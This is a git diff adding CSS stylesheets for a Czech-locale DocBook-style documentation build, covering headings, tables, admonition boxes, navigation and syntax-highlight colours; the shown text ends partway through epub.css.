diff --git a/tmp/cs-CZ/xml/Common_Content/css/common.css b/tmp/cs-CZ/xml/Common_Content/css/common.css
new file mode 100644
index 000000000..d87ec69f5
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/css/common.css
@@ -0,0 +1,1740 @@
+* {
+	widows: 4 !important;
+	orphans: 4 !important;
+}
+
+body, h1, h2, h3, h4, h5, h6, pre, li, div {
+	line-height: 1.29em;
+}
+
+body {
+	background-color: white;
+	margin:0 auto;
+	font-family: "liberation sans", "Myriad ", "Bitstream Vera Sans", "Lucida Grande", "Luxi Sans", "Trebuchet MS", helvetica, verdana, arial, sans-serif;
+	font-size: 14px;
+	max-width: 770px;
+	color: black;
+}
+
+body.toc_embeded {
+	/*for web hosting system only*/
+	margin-left: 300px;
+}
+
+object.toc, iframe.toc {
+	/*for web hosting system only*/
+	border-style: none;
+	position: fixed;
+	width: 290px;
+	height: 99.99%;
+	top: 0;
+	left: 0;
+	z-index: 100;
+	border-style: none;
+	border-right:1px solid #999;
+}
+
+/* Hide web menu */
+
+body.notoc {
+	margin-left: 3em;
+}
+
+iframe.notoc {
+	border-style:none;
+	border: none;
+	padding: 0px;
+	position:fixed;
+	width: 21px;
+	height: 29px;
+	top: 0px;
+	left:0;
+	overflow: hidden;
+	margin: 0px;
+	margin-left: -3px;
+}
+/* End hide web menu */
+
+/* desktop styles */
+body.desktop {
+	margin-left: 26em;
+}
+
+body.desktop .book > .toc {
+	display:block;
+	width:24em;
+	height:99.99%;
+	position:fixed;
+	overflow:auto;
+	top:0px;
+	left:0px;
+/*	padding-left:1em; */
+	background-color:#EEEEEE;
+	font-size: 12px;
+}
+
+body.pdf {
+	max-width: 100%;
+}
+
+.toc {
+	line-height:1.35em;
+}
+
+.toc .glossary,
+.toc .chapter, .toc .appendix {
+	margin-top:1em;
+}
+
+.toc .part {
+	margin-top:1em;
+	display:block;
+}
+
+span.glossary,
+span.appendix {
+	display:block;
+	margin-top:0.5em;
+}
+
+div {
+	padding-top:0px;
+}
+
+div.section {
+}
+
+p, div.para {
+	padding-top: 0px;
+	margin-top: 1em;
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+}
+
+div.formalpara {
+	padding-top: 0px;
+	margin-top: 1em;
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+}
+
+.varlistentry div.para {
+
+}
+
+/*Links*/
+a {
+	outline: none;
+}
+
+a:link {
+	text-decoration: none;
+	border-bottom: 1px dotted ;
+	color:#3366cc;
+}
+
+body.pdf a:link {
+	word-wrap: break-word;
+}
+
+a:visited {
+	text-decoration:none;
+	border-bottom: 1px dotted ;
+	color:#003366;
+}
+
+div.longdesc-link {
+	float:right;
+	color:#999;
+}
+
+.toc a, .qandaset a {
+	font-weight:normal;
+	border:none;
+}
+
+.toc a:hover, .qandaset a:hover
+{
+	border-bottom: 1px dotted;
+}
+
+/*headings*/
+h1, h2, h3, h4, h5, h6 {
+	color: #336699;
+	margin-top: 0px;
+	margin-bottom: 0px;
+	background-color: transparent;
+	margin-bottom: 0px;
+	margin-top: 20px;
+	word-wrap: break-word;
+}
+
+h1 {
+	font-size: 22px;
+}
+
+.titlepage h1.title {
+	text-align:left;
+}
+
+.book > .titlepage h1.title {
+	text-align: center;
+}
+
+.article > .titlepage h1.title,
+.article > .titlepage h2.title {
+	text-align: center;
+}
+
+.set .titlepage > div > div > h1.title {
+	text-align: center;
+}
+
+.part > .titlepage h1.title {
+	text-align: center;
+	font-size: 24px;
+}
+
+div.producttitle {
+	margin-top: 0px;
+	margin-bottom: 20px;
+	font-size: 48px;
+	font-weight: bold;
+/* 	background: #003d6e url(../images/h1-bg.png) top left repeat-x; */
+	color:  #336699;
+	text-align: center;
+	padding-top: 12px;
+}
+
+.titlepage .corpauthor {
+	margin-top: 1em;
+	text-align: center;
+}
+
+.section h1.title {
+	font-size: 18px;
+	padding: 0px;
+	color: #336699;
+	text-align: left;
+	background: white;
+}
+
+h2 {
+	font-size: 20px;
+	margin-top: 30px;
+}
+
+
+.book div.subtitle, .book h2.subtitle, .book h3.subtitle {
+	margin-top: 1em;
+	margin-bottom: 1em;
+	font-size: 18px;
+	text-align: center;
+}
+
+div.subtitle {
+	color:  #336699;
+	font-weight: bold;
+}
+
+h1.legalnotice {
+	font-size: 24px;
+}
+
+.preface > div > div > div > h2.title,
+.preface > div > div > div > h1.title {
+	margin-top: 1em;
+	font-size: 24px;
+}
+
+.appendix h2 {
+	font-size: 24px;
+}
+
+
+
+h3 {
+	font-size: 14px;
+	padding-top:0px;
+	padding-bottom: 0px;
+	margin-bottom: 0px;
+}
+h4 {
+	font-size: 14px;
+	padding-top:0px;
+	padding-bottom:0px;
+}
+
+h5 {
+	font-size: 14px;
+}
+
+h6 {
+	font-size: 14px;
+	margin-bottom: 0px;
+}
+
+.abstract h6 {
+	margin-top:1em;
+	margin-bottom:.5em;
+	font-size: 24px;
+}
+
+.index > div > div > div > h2.title {
+	font-size: 24px;
+}
+
+.chapter > div > div > div > h2.title {
+	font-size: 24px;
+}
+
+.section > div > div > div > h2.title {
+	font-size: 21px;
+}
+
+.section > div > div > div > h3.title {
+	font-size: 17px;
+}
+
+/*element rules*/
+hr {
+	border-collapse: collapse;
+	border-style:none;
+	border-top: 1px dotted #ccc;
+	width:100%;
+}
+
+/* web site rules */
+ul.languages, .languages li {
+	display:inline;
+	padding:0px;
+}
+
+.languages li a {
+	padding:0px .5em;
+	text-decoration: none;
+}
+
+.languages li p, .languages li div.para {
+	display:inline;
+}
+
+.languages li a:link, .languages li a:visited {
+	color:#444;
+}
+
+.languages li a:hover, .languages li a:focus, .languages li a:active {
+	color:black;
+}
+
+ul.languages {
+	display:block;
+	background-color:#eee;
+	padding:.5em;
+}
+
+/*supporting stylesheets*/
+
+/*unique to the webpage only*/
+.books {
+	position:relative;
+}
+
+.versions li {
+	width:100%;
+	clear:both;
+	display:block;
+}
+
+a.version {
+	font-size: 20px;
+	text-decoration:none;
+	width:100%;
+	display:block;
+	padding:1em 0px .2em 0px;
+	clear:both;
+}
+
+a.version:before {
+	content:"Version";
+	font-size: smaller;
+}
+
+a.version:visited, a.version:link {
+	color:#666;
+}
+
+a.version:focus, a.version:hover {
+	color:black;
+}
+
+.books {
+	display:block;
+	position:relative;
+	clear:both;
+	width:100%;
+}
+
+.books li {
+	display:block;
+	width:200px;
+	float:left;
+	position:relative;
+	clear: none ;
+}
+
+.books .html {
+	width:170px;
+	display:block;
+}
+
+.books .pdf {
+	position:absolute;
+	left:170px;
+	top:0px;
+	font-size: smaller;
+}
+
+.books .pdf:link, .books .pdf:visited {
+	color:#555;
+}
+
+.books .pdf:hover, .books .pdf:focus {
+	color:#000;
+}
+
+.books li a {
+	text-decoration:none;
+}
+
+.books li a:hover {
+	color:black;
+}
+
+/*products*/
+.products li {
+	display: block;
+	width:300px;
+	float:left;
+}
+
+.products li a {
+	width:300px;
+	padding:.5em 0px;
+}
+
+.products ul {
+	clear:both;
+}
+
+/*revision history*/
+.revhistory {
+	display:block;
+}
+
+.revhistory table {
+	background-color:transparent;
+	border-color:#fff;
+	padding:0px;
+	margin: 0;
+	border-collapse:collapse;
+	border-style:none;
+}
+
+.revhistory td {
+	text-align :left;
+	padding:0px;
+	border: none;
+	border-top: 1px solid #fff;
+	font-weight: bold;
+}
+
+.revhistory .simplelist td {
+	font-weight: normal;
+}
+
+.revhistory .simplelist {
+	margin-bottom: 1.5em;
+	margin-left: 1em;
+}
+
+.revhistory table th {
+	display: none;
+}
+
+
+/*credits*/
+.authorgroup div {
+	clear:both;
+	text-align: center;
+}
+
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib {
+	margin: 0px;
+	padding: 0px;
+	margin-top: 12px;
+	font-size: 14px;
+	font-weight: bold;
+	color: #336699;
+}
+
+div.editedby {
+	margin-top: 15px;
+	margin-bottom: -0.8em;
+}
+
+div.authorgroup .author, 
+div.authorgroup.editor, 
+div.authorgroup.translator, 
+div.authorgroup.othercredit,
+div.authorgroup.contrib {
+	display: block;
+	font-size: 14px;
+}
+
+.revhistory .author {
+	display: inline;
+}
+
+.othercredit h3 {
+	padding-top: 1em;
+}
+
+
+.othercredit {
+	margin:0px;
+	padding:0px;
+}
+
+.releaseinfo {
+	clear: both;
+}
+
+.copyright {
+	margin-top: 1em;
+}
+
+/* qanda sets */
+.answer {
+	margin-bottom:1em;
+	border-bottom:1px dotted #ccc;
+}
+
+.qandaset .toc {
+	border-bottom:1px dotted #ccc;
+}
+
+.question {
+	font-weight:bold;
+}
+
+.answer .data, .question .data {
+	padding-left: 2.6em;
+}
+
+.answer .label, .question .label {
+	float:left;
+	font-weight:bold;
+}
+
+/* inline syntax highlighting */
+.perl_Alert {
+	color: #0000ff;
+}
+
+.perl_BaseN {
+	color: #007f00;
+}
+
+.perl_BString {
+	color: #5C3566;
+}
+
+.perl_Char {
+	color: #ff00ff;
+}
+
+.perl_Comment {
+	color: #888888;
+}
+
+
+.perl_DataType {
+	color: #0000ff;
+}
+
+
+.perl_DecVal {
+	color: #00007f;
+}
+
+
+.perl_Error {
+	color: #ff0000;
+}
+
+
+.perl_Float {
+	color: #00007f;
+}
+
+
+.perl_Function {
+	color: #007f00;
+}
+
+
+.perl_IString {
+	color: #5C3566;
+}
+
+
+.perl_Keyword {
+	color: #002F5D;
+}
+
+
+.perl_Operator {
+	color: #ffa500;
+}
+
+
+.perl_Others {
+	color: #b03060;
+}
+
+
+.perl_RegionMarker {
+	color: #96b9ff;
+}
+
+
+.perl_Reserved {
+	color: #9b30ff;
+}
+
+
+.perl_String {
+	color: #5C3566;
+}
+
+
+.perl_Variable {
+	color: #0000ff;
+}
+
+
+.perl_Warning {
+	color: #0000ff;
+}
+
+/*Lists*/
+ul {
+    list-style-image: url("../images/dot.png");
+    list-style-type: circle;
+    padding-left: 1.6em;
+}
+
+ul ul {
+    list-style-image: url("../images/dot2.png");
+    list-style-type: circle;
+}
+
+ol.1 {
+	list-style-type: decimal;
+}
+
+ol.a,
+ol ol {
+	list-style-type: lower-alpha;
+}
+
+ol.i {
+	list-style-type: lower-roman;
+}
+ol.A {
+	list-style-type: upper-alpha;
+}
+
+ol.I {
+	list-style-type: upper-roman;
+}
+
+dt {
+	font-weight:bold;
+	margin-bottom:0px;
+	padding-bottom:0px;
+}
+
+dd {
+	margin:0px;
+	margin-left:2em;
+	padding-top:0px;
+}
+
+li {
+	padding-top: 0px;
+	margin-top: 0px;
+	padding-bottom: 0px;
+/*	margin-bottom: 16px; */
+}
+
+/*images*/
+img {
+	display:block;
+	margin: 2em 0;
+	max-width: 100%;
+}
+
+.inlinemediaobject,
+.inlinemediaobject img,
+.inlinemediaobject object {
+	display:inline;
+	margin:0px;
+	overflow: hidden;
+}
+
+.figure {
+    margin-top: 1em;
+    width: 100%;
+}
+
+.figure img,
+.mediaobject img {
+	display:block;
+	margin: 0em;
+}
+
+.figure .title {
+	margin-bottom:2em;
+	padding:0px;
+}
+
+/*document modes*/
+.confidential {
+	background-color:#900;
+	color:White;
+	padding:.5em .5em;
+	text-transform:uppercase;
+	text-align:center;
+}
+
+.longdesc-link {
+	display:none;
+}
+
+.longdesc {
+	display:none;
+}
+
+.prompt {
+	padding:0px .3em;
+}
+
+/*user interface styles*/
+.screen .replaceable {
+}
+
+.guibutton, .guilabel {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight: bold;
+}
+
+.example {
+	background-color: #ffffff;
+	border-left: 3px solid #aaaaaa;
+	padding-top: 1px;
+	padding-bottom: 0.1em;
+	padding-left: 1em;
+}
+
+.equation {
+	border-left: 3px solid #aaaaaa;
+	background-color: #ffffff;
+	padding-top: 1px;
+	padding-bottom: 0.1em;
+	padding-left: 1em;
+}
+
+.equation-contents {
+	margin-left: 4em;
+}
+
+div.title {
+	margin-bottom: 1em;
+	font-weight: 14px;
+	font-weight: bold;
+	color: #336699;
+	word-wrap: break-word;
+}
+
+.example-contents {
+	background-color: #ffffff;
+}
+
+.example-contents .para {
+/*	 padding: 10px;*/
+}
+
+/*terminal/console text*/
+.computeroutput, 
+.option {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight:bold;
+}
+
+.replaceable {
+	font-style: italic;
+}
+
+.command, .filename, .keycap, .classname, .literal {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight:bold;
+}
+
+/* no bold in toc */
+.toc * {
+	font-weight: inherit;
+}
+
+.toc H1 {
+	font-weight: bold;
+}
+
+
+div.programlisting {
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+}
+
+pre {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	display:block;
+	background-color: #f5f5f5;
+	color: #000000;
+/*	border: 1px solid #aaaaaa; */
+	margin-bottom: 1em;
+	padding:.5em 1em;
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+	font-size: 0.9em;
+	border-style:none;
+	box-shadow: 0 2px 5px #AAAAAA inset;
+	-moz-box-shadow:  0 2px 5px #AAAAAA inset;
+	-webkit-box-shadow: 0 2px 5px #AAAAAA inset;
+	-o-box-shadow: 0 2px 5px #AAAAAA inset;
+}
+
+body.pdf pre {
+	border: 1px solid #AAAAAA;
+	box-shadow: none;
+	-moz-box-shadow: none;
+	-webkit-box-shadow: none;
+	-o-box-shadow: none;
+}
+
+
+pre .replaceable, 
+pre .keycap {
+}
+
+code {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	white-space: pre-wrap;
+	word-wrap: break-word;
+	font-weight:bold;
+}
+
+.parameter code {
+	display: inline;
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+}
+
+code.email {
+	font-weight: normal;
+	font-family: "liberation sans", "Myriad ", "Bitstream Vera Sans", "Lucida Grande", "Luxi Sans", "Trebuchet MS", helvetica, verdana, arial, sans-serif;
+
+}
+
+/*Notifications*/
+div.warning:before {
+	content:url(../images/warning.png);
+	padding-left: 5px;
+}
+
+div.note:before {
+	content:url(../images/note.png);
+	padding-left: 5px;
+}
+
+div.important:before {
+	content:url(../images/important.png);
+	padding-left: 5px;
+}
+
+div.warning, div.note, div.important {
+	color: black;
+	margin: 0px;
+	padding: 0px;
+	background: none;
+	background-color: white;
+	margin-bottom: 1em;
+	border-bottom: 1px solid #aaaaaa;
+}
+
+div.admonition_header p {
+	margin: 0px;
+	padding: 0px;
+	color: #eeeeec;
+	padding-top: 0px;
+	padding-bottom: 0px;
+	height: 1.4em;
+	line-height: 1.4em;
+	font-size: 17px;
+	display:inline;
+}
+
+div.admonition_header {
+	background-origin:content-box;
+	clear: both;
+	margin: 0px;
+	padding: 0px;
+	margin-top: -40px;
+	padding-left: 58px;
+	line-height: 1.0px;
+	font-size: 1.0px;
+}
+
+div.warning div.admonition_header {
+	background: url(../images/red.png) top left repeat-x;
+	background-color: #590000;
+	background: -webkit-linear-gradient(#a40000,#590000);
+	background: linear-gradient(#a40000,#590000);
+}
+
+div.note div.admonition_header {
+	background: url(../images/green.png) top right repeat-x;
+	background-color: #597800;
+	background: -webkit-linear-gradient(#769f00,#597800);
+	background: linear-gradient(#769f00,#597800);
+}
+
+div.important div.admonition_header {
+	background: url(../images/yellow.png) top right repeat-x;
+	background-color: #a6710f;
+	background: -webkit-linear-gradient(#d08e13,#a6710f);
+	background: linear-gradient(#d08e13,#a6710f);
+}
+
+div.warning p:first-child,
+div.warning div.para:first-child,
+div.note p:first-child,
+div.note div.para:first-child,
+div.important p:first-child,
+div.important div.para:first-child {
+	padding: 0px;
+	margin: 0px;
+}
+
+div.admonition {
+	border: none;
+	border-left: 1px solid #aaaaaa;
+	border-right: 1px solid #aaaaaa;
+	padding:0px;
+	margin:0px;
+	padding-top: 1.5em;
+	padding-bottom: 1em;
+	padding-left: 2em;
+	padding-right: 1em;
+	background-color: #eeeeec;
+	-moz-border-radius: 0px;
+	-webkit-border-radius: 0px;
+	border-radius: 0px;
+}
+
+/*Page Title*/
+#title  {
+	display:block;
+	height:45px;
+	padding-bottom:1em;
+	margin:0px;
+}
+
+#title a.left{
+	display:inline;
+	border:none;
+}
+
+#title a.left img{
+	border:none;
+	float:left;
+	margin:0px;
+	margin-top:.7em;
+}
+
+#title a.right {
+	padding-bottom:1em;
+}
+
+#title a.right img {
+	border:none;
+	float:right;
+	margin:0px;
+	margin-top:.7em;
+}
+
+/*Table*/
+div.table {
+}
+
+table {
+	border: 1px solid #444;
+	width:100%;
+	border-collapse:collapse;
+	table-layout: fixed;
+	word-wrap: break-word;
+}
+
+table.blockquote,
+table.simplelist,
+.calloutlist table {
+	border-style: none;
+}
+
+table th {
+	text-align:left;
+	background-color:#6699cc;
+	padding:.3em .5em;
+	color:white;
+}
+
+table td {
+	padding:.15em .5em;
+}
+
+table tr.even td {
+	background-color:#f5f5f5;
+}
+
+tr:nth-child(even) {
+	background-color: #eeeeee;
+
+}
+
+
+table th p:first-child, table td p:first-child, table  li p:first-child,
+table th div.para:first-child, table td div.para:first-child, table  li div.para:first-child {
+	margin-top:0px;
+	padding-top:0px;
+	display:inline;
+}
+
+th, td {
+	border-style:none;
+	vertical-align: top;
+/* 	border: 1px solid #000; */
+}
+
+.blockquote td, 
+.simplelist th,
+.simplelist td {
+	border: none;
+}
+
+table table td {
+	border-bottom:1px dotted #aaa;
+	background-color:white;
+	padding:.6em 0px;
+}
+
+table table {
+	border:1px solid white;
+}
+
+td.remarkval {
+	color:#444;
+}
+
+td.fieldval {
+	font-weight:bold;
+}
+
+.lbname, .lbtype, .lbdescr, .lbdriver, .lbhost {
+	color:white;
+	font-weight:bold;
+	background-color:#999;
+	width:120px;
+}
+
+td.remarkval {
+	width:230px;
+}
+
+td.tname {
+	font-weight:bold;
+}
+
+th.dbfield {
+	width:120px;
+}
+
+th.dbtype {
+	width:70px;
+}
+
+th.dbdefault {
+	width:70px;
+}
+
+th.dbnul {
+	width:70px;
+}
+
+th.dbkey {
+	width:70px;
+}
+
+span.book {
+	margin-top:4em;
+	display:block;
+	font-size: 11pt;
+}
+
+span.book a{
+	font-weight:bold;
+}
+span.chapter {
+	display:block;
+}
+
+table.simplelist td, .calloutlist table td {
+	border-style: none;
+}
+
+
+table.lt-4-cols.lt-7-rows td {
+	border: none;
+}
+/*to simplify layout*/
+
+
+table.lt-4-cols.gt-14-rows tr:nth-child(odd) {
+	background-color: #fafafa;
+}
+/* to keep simple but stripe rows */ 
+
+
+.gt-8-cols td {
+	border-left: 1px solid #ccc;
+}
+
+.gt-8-cols td:first-child {
+	border-left: 0;
+}
+/* to apply vertical lines to differentiate columns*/
+
+/*Breadcrumbs*/
+#breadcrumbs ul li.first:before {
+	content:" ";
+}
+
+#breadcrumbs {
+	color:#900;
+	padding:3px;
+	margin-bottom:25px;
+}
+
+#breadcrumbs ul {
+	margin-left:0;
+	padding-left:0;
+	display:inline;
+	border:none;
+}
+
+#breadcrumbs ul li {
+	margin-left:0;
+	padding-left:2px;
+	border:none;
+	list-style:none;
+	display:inline;
+}
+
+#breadcrumbs ul li:before {
+	content:"\0020 \0020 \0020 \00BB \0020";
+	color:#333;
+}
+
+dl {
+	margin-top: 0px;
+	margin-left: 28px;
+}
+
+.toc dl {
+	margin-left: 10px;
+}
+
+/*index*/
+.glossary h3, 
+.index h3 {
+	font-size: 20px;
+	color:#aaa;
+	margin:0px;
+}
+
+.indexdiv {
+	margin-bottom:1em;
+}
+
+.glossary dt,
+.index dt {
+	color:#444;
+	padding-top:.5em;
+}
+
+.glossary dl dl dt, 
+.index dl dl dt {
+	color:#777;
+	font-weight:normal;
+	padding-top:0px;
+}
+
+.index dl dl dt:before {
+	content:"- ";
+	color:#ccc;
+}
+
+/*changes*/
+.footnote {
+	font-size: 10px;
+	margin: 0px;
+	color: #222;
+}
+
+.footnotes {
+	margin-bottom: 60px;
+}
+
+table .footnote {
+}
+
+sup {
+	margin:0px;
+	padding:0px;
+	font-size: 10px;
+	padding-left:0px;
+}
+
+.footnote {
+	position:relative;
+}
+
+.footnote sup  {
+	color: black;
+	left: .4em;
+}
+
+.footnote a:link,
+.footnote a:visited {
+	text-decoration:none;
+	border: none;
+}
+
+.footnote .para sup  {
+/*	position:absolute; */
+	vertical-align:text-bottom;
+}
+
+a.footnote {
+	padding-right: 0.5em;
+	text-decoration:none;
+	border: none;
+} 
+
+.footnote sup a:link, 
+.footnote sup a:visited {
+	color:#92917d;
+	text-decoration:none;
+}
+
+.footnote:hover sup a {
+	text-decoration:none;
+}
+
+.footnote p,.footnote div.para {
+	padding-left:1em;
+}
+
+.footnote a:link, 
+.footnote a:visited before{
+	color:#00537c;
+}
+
+.footnote a:hover {
+}
+
+/**/
+.pdf-break {
+}
+
+div.legalnotice {
+}
+
+div.abstract {
+}
+
+div.chapter {
+}
+
+
+div.titlepage, div.titlepage > div, div.titlepage > div > div {
+}
+
+div.preface, div.part {
+}
+
+div.appendix {
+}
+
+div.section {
+}
+
+
+dt.varlistentry {
+}
+
+dd {
+}
+
+div.note .replaceable, 
+div.important .replaceable, 
+div.warning .replaceable, 
+div.note .keycap, 
+div.important .keycap, 
+div.warning .keycap
+{
+}
+
+ul li p:last-child, ul li para:last-child {
+	margin-bottom:0px;
+	padding-bottom:0px;
+}
+
+/*document navigation*/
+.docnav a, .docnav strong {
+	border:none;
+	text-decoration:none;
+	font-weight:normal;
+}
+
+.docnav {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+	position:relative;
+	width:100%;
+	padding-bottom:2em;
+	padding-top:1em;
+        height:2.5em;
+        line-height:2.5em;
+/*
+	border-top:1px dotted #ccc;
+        background-color: rgba(240, 240, 240, 0.9);
+-webkitbox-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+  -moz-box-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+       box-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+*/
+}
+
+.docnav li {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+	display:inline;
+	font-size: 14px;
+}
+
+.docnav li:before {
+	content:" ";
+}
+
+.docnav li.previous, .docnav li.next {
+	position:absolute;
+	top:1.5em;
+}
+
+.docnav li.up, .docnav li.home {
+	margin:0px 1.5em;
+}
+
+.docnav.top li.home {
+	color: #336699;
+	font-size: 22pt;
+	font-weight: bold;
+}
+
+
+.docnav li.previous {
+	left:0px;
+	text-align:left;
+}
+
+.docnav li.next {
+	right:0px;
+	text-align:right;
+}
+
+.docnav li.previous strong, .docnav li.next strong {
+	height: 17px;
+	display: block;
+}
+
+.docnav {
+	margin:0 auto;
+	text-align:center;
+}
+
+.docnav li.next a strong {
+	background:  url(../images/stock-go-forward.png) right 120% no-repeat;
+	padding-top:3px;
+	padding-bottom:4px;
+	padding-right:28px;
+}
+
+.docnav li.previous a strong {
+	background: url(../images/stock-go-back.png) left 120% no-repeat;
+	padding-top:3px;
+	padding-bottom:4px;
+	padding-left:28px;
+	padding-right:0.5em;
+}
+
+.docnav li.home a strong {
+	background: url(../images/stock-home.png) top left no-repeat;
+	padding:5px;
+	padding-left:28px;
+}
+
+.docnav li.up a strong {
+	background: url(../images/stock-go-up.png) top left no-repeat;
+	padding:5px;
+	padding-left:28px;
+}
+
+.docnav a:link, .docnav a:visited {
+	color:#666;
+}
+
+.docnav a:hover, .docnav a:focus, .docnav a:active {
+	color:black;
+}
+
+.docnav a {
+	max-width: 10px;
+	overflow:hidden;
+}
+
+.docnav a:link strong {
+	text-decoration:none;
+}
+
+.docnav {
+	margin:0 auto;
+	text-align:center;
+}
+
+ul.docnav {
+	margin-bottom: 1em;
+}
+/* Reports */
+.reports ul {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+}
+
+.reports li{
+	margin:0px;
+	padding:0px;
+}
+
+.reports li.odd {
+	background-color: #eeeeee;
+	margin:0px;
+	padding:0px;
+}
+
+.reports dl {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	float:right;
+	margin-right: 17em;
+	margin-top:-1.3em;
+}
+
+.reports dt {
+	display:inline;
+	margin:0px;
+	padding:0px;
+}
+
+.reports dd {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	padding-right:.5em;
+}
+
+.reports h2, .reports h3{
+	display:inline;
+	padding-right:.5em;
+	font-size: 14px;
+	font-weight:normal;
+}
+
+.reports div.progress {
+	display:inline;
+	float:right;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	margin:0px;
+	margin-top:-1.3em;
+	padding:0px;
+	border:none;
+}
+
+/*uniform*/
+body.results, body.reports {
+	max-width:57em ;
+	padding:0px;
+}
+
+/*Progress Bar*/
+div.progress {
+	display:block;
+	float:left;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	height:1em;
+}
+
+div.progress span {
+	height:1em;
+	float:left;
+}
+
+div.progress span.translated {
+	background:#6c3 url(../images/shine.png) top left repeat-x;
+}
+
+div.progress span.fuzzy {
+	background:#ff9f00 url(../images/shine.png) top left repeat-x;
+}
+
+
+/*Results*/
+
+.results ul {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+}
+
+.results li{
+	margin:0px;
+	padding:0px;
+}
+
+.results li.odd {
+	background-color: #eeeeee;
+	margin:0px;
+	padding:0px;
+}
+
+.results dl {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	float:right;
+	margin-right: 17em;
+	margin-top:-1.3em;
+}
+
+.results dt {
+	display:inline;
+	margin:0px;
+	padding:0px;
+}
+
+.results dd {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	padding-right:.5em;
+}
+
+.results h2, .results h3 {
+	display:inline;
+	padding-right:.5em;
+	font-size: 14px;
+	font-weight:normal;
+}
+
+.results div.progress {
+	display:inline;
+	float:right;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	margin:0px;
+	margin-top:-1.3em;
+	padding:0px;
+	border:none;
+}
+
+/* Dirty EVIL Mozilla hack for round corners */
+pre {
+	-moz-border-radius:11px;
+	-webkit-border-radius:11px;
+	border-radius: 11px;
+}
+
+.example {
+	-moz-border-radius:0px;
+	-webkit-border-radius:0px;
+	border-radius: 0px;
+}
+
+/* move these invisible fields out of the flow */
+.example > a:first-child,
+.table > a:first-child,
+.procedure > a:first-child {
+    float: left;
+}
+
+.package, .citetitle {
+	font-style: italic;
+}
+
+.titlepage .edition,
+.titlepage .releaseinfo {
+	color: #336699;
+	background-color: transparent;
+	margin-top: 1em;
+	margin-bottom: 1em;
+	font-size: 20px;
+	font-weight: bold;
+	text-align: center;
+}
+
+span.remark {
+	background-color: #ff00ff;
+}
+
+.draft {
+	background-image: url(../images/watermark-draft.png);
+	background-repeat: repeat-y;
+        background-position: center;
+}
+
+.foreignphrase {
+	font-style: inherit;
+}
+
+dt {
+	clear:both;
+}
+
+dt img {
+	border-style: none;
+	max-width: 112px;
+}
+
+dt object {
+	max-width: 112px;
+}
+
+dt .inlinemediaobject, dt object {
+	display: inline;
+	float: left;
+	margin-bottom: 1em;
+	padding-right: 1em;
+	width: 112px;
+}
+
+dl:after {
+	display: block;
+	clear: both;
+	content: "";
+}
+
+.toc dd {
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+	padding-left: 1.3em;
+	margin-left: 0px;
+}
+
+div.toc > dl > dt {
+	padding-bottom: 0px;
+	margin-bottom: 0px;
+	margin-top: 1em;
+}
+
+
+.strikethrough {
+	text-decoration: line-through;
+}
+
+.underline {
+	text-decoration: underline;
+}
+
+.calloutlist img,
+.callout {
+	padding: 0px;
+	margin: 0px;
+	width: 12pt;
+	display: inline;
+	vertical-align: middle;
+}
+
+li.step > a:first-child {
+	display: block;
+}
+
+.stepalternatives {
+	list-style-image: none;
+	list-style-type: upper-alpha;
+}
+.task {
+}
+
+
+.added {
+	background-color: #99ff99;
+}
+
+.changed {
+	background-color: #ffff77;
+}
+
+.deleted {
+	background-color: #ff4455;
+	text-decoration: line-through;
+}
+
+
diff --git a/tmp/cs-CZ/xml/Common_Content/css/default.css b/tmp/cs-CZ/xml/Common_Content/css/default.css
new file mode 100644
index 000000000..7fb9ada5c
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/css/default.css
@@ -0,0 +1,4 @@
+@import url("common.css");
+@import url("overrides.css");
+@import url("lang.css");
+
diff --git a/tmp/cs-CZ/xml/Common_Content/css/epub.css b/tmp/cs-CZ/xml/Common_Content/css/epub.css
new file mode 100644
index 000000000..b0ffd43cb
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/css/epub.css
@@ -0,0 +1,115 @@
+/*headings*/
+h1, h2, h3, h4, h5, h6,
+div.producttitle,
+div.subtitle,
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib,
+.title,
+.titlepage .edition {
+}
+
+div.para {
+	margin-top: 1em;
+}
+/* inline syntax highlighting */
+.perl_Alert {
+	color: #0000ff;
+}
+
+.perl_BaseN {
+	color: #007f00;
+}
+
+.perl_BString {
+	color: #5C3566;
+}
+
+.perl_Char {
